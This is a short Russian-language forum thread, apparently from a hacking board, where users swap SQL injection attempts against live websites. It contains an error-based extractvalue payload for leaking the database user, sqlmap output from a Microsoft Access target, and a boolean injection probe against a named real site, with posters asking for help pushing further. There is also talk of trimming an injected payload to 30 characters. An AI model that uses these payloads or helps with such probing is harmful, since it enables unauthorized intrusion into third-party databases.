У меня в браезере что с вашей сессией, что без - кидает на второй скрин, ничего не меняется. Попробуйте выполнить

777") and extractvalue(1,concat(1,user()))=("1

Там вероятно update используется, хотя возможно и простая выборка.

DB Error

You have an error in your SQL syntax;

чем передаешь POST-запросы? Не могу добиться выводы ошибки в Http Analyzer

POST запрос передаю через плагин в Мозиле, HackBar.

*Удалено по просьбе автора*

sqlmap вывел таблици

только вот кодировка непонятная не могу в нормальный вид вывести

помогите пожалуйста....

back-end DBMS: Microsoft Access

Database:

[2 tables]

+--------------------------------------------------------------+

| {AIP|h3I$0?QE?2§4%H87HFE\n>p |

| {AIP|\x154%\x12\x11H87H\x1fFE\\n>p |

+--------------------------------------------------------------+

Вставка в параметр или в тело?

30 Символов. Если найти 5-буквенный домен, это 29. Может быть как-то еще закрывающий тег можно опустить.

P.S. Два слэша означают использование протокола сайта(HTTPS при HTTPS и HTTP при HTTP).

http://www.btlt.ru/comp/index.php?a=p&cat=8 and substring(@@version,1,1)=5

а дальше никак...!

окажите помощь!

так неинтересно!